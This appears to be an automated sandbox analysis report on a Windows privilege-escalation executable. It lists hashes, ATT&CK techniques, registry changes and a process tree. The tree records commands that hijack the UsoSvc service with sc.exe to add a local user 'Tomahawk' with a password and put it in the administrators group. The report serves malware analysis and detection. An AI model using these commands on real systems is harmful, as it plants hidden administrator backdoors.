c977ae66e324525a57dd0982d670fce03626aa70b4c57e7aff2ba8eab97e4e75

Analysis

max time kernel
118s
max time network
122s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
03/12/2024, 06:57

Target

Erebus-master/exp/com/1405_1322_x64.exe
Size

132KB
MD5

2e2ddfd6d3a10d5dd51f8cbdeaeb4b75
SHA1

bf51231e74fe5ce86e612e8bec16bc555afb7d73
SHA256

85bd47cc708f80a3e9aebc5948404017053eec1c316f2c3b527011f19597ab1f
SHA512

ec9f48e571982954e98ecb76156c8c619a67c7c6dc75c3d1319ddd8fca992f4a47e86d0735882320ef4bc8ebca39c763f18e19981b7d50bb4c7db1563de90c25
SSDEEP

3072:0Ud3B51Sbph2PlpHyKE+LrmeTwMJV4NalCD:0Ix51SFA95yKEUxz

Score

8^/10

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

Modifies data under HKEY_USERS 12 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	upnpcont.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	upnpcont.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	upnpcont.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft	upnpcont.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion	upnpcont.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows	upnpcont.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Shell Extensions	upnpcont.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000a0fcd19b5045db01	upnpcont.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	upnpcont.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	upnpcont.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached	upnpcont.exe
Key created	\REGISTRY\USER\S-1-5-19\Software	upnpcont.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2328 wrote to memory of 2544	2328	upnpcont.exe	32
PID 2328 wrote to memory of 2544	2328	upnpcont.exe	32
PID 2328 wrote to memory of 2544	2328	upnpcont.exe	32
PID 2328 wrote to memory of 2500	2328	upnpcont.exe	35
PID 2328 wrote to memory of 2500	2328	upnpcont.exe	35
PID 2328 wrote to memory of 2500	2328	upnpcont.exe	35
PID 2328 wrote to memory of 2832	2328	upnpcont.exe	37
PID 2328 wrote to memory of 2832	2328	upnpcont.exe	37
PID 2328 wrote to memory of 2832	2328	upnpcont.exe	37
PID 2328 wrote to memory of 2968	2328	upnpcont.exe	39
PID 2328 wrote to memory of 2968	2328	upnpcont.exe	39
PID 2328 wrote to memory of 2968	2328	upnpcont.exe	39
PID 2328 wrote to memory of 3012	2328	upnpcont.exe	41
PID 2328 wrote to memory of 3012	2328	upnpcont.exe	41
PID 2328 wrote to memory of 3012	2328	upnpcont.exe	41
PID 2328 wrote to memory of 2892	2328	upnpcont.exe	43
PID 2328 wrote to memory of 2892	2328	upnpcont.exe	43
PID 2328 wrote to memory of 2892	2328	upnpcont.exe	43
PID 2328 wrote to memory of 2816	2328	upnpcont.exe	45
PID 2328 wrote to memory of 2816	2328	upnpcont.exe	45
PID 2328 wrote to memory of 2816	2328	upnpcont.exe	45
PID 2328 wrote to memory of 2720	2328	upnpcont.exe	47
PID 2328 wrote to memory of 2720	2328	upnpcont.exe	47
PID 2328 wrote to memory of 2720	2328	upnpcont.exe	47
PID 2328 wrote to memory of 2208	2328	upnpcont.exe	49
PID 2328 wrote to memory of 2208	2328	upnpcont.exe	49
PID 2328 wrote to memory of 2208	2328	upnpcont.exe	49

C:\Users\Admin\AppData\Local\Temp\Erebus-master\exp\com\1405_1322_x64.exe
"C:\Users\Admin\AppData\Local\Temp\Erebus-master\exp\com\1405_1322_x64.exe"
1⤵
PID:3060

C:\Windows\system32\upnpcont.exe
C:\Windows\system32\upnpcont.exe -Embedding
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2328
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2544
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" config UsoSvc binpath= "cmd.exe /c net user /add Tomahawk RibSt3ak69 &"
  2⤵
  - Launches sc.exe
  PID:2500
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" start UsoSvc
  2⤵
  - Launches sc.exe
  PID:2832
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2968
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" config UsoSvc binpath= "cmd.exe /c net localgroup administrators /add Tomahawk & "
  2⤵
  - Launches sc.exe
  PID:3012
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" start UsoSvc
  2⤵
  - Launches sc.exe
  PID:2892
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2816
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" config UsoSvc binpath= "C:\WINDOWS\system32\svchost.exe - k netsvcs - p"
  2⤵
  - Launches sc.exe
  PID:2720
- C:\Windows\System32\sc.exe
  "C:\Windows\System32\sc.exe" start UsoSvc
  2⤵
  - Launches sc.exe
  PID:2208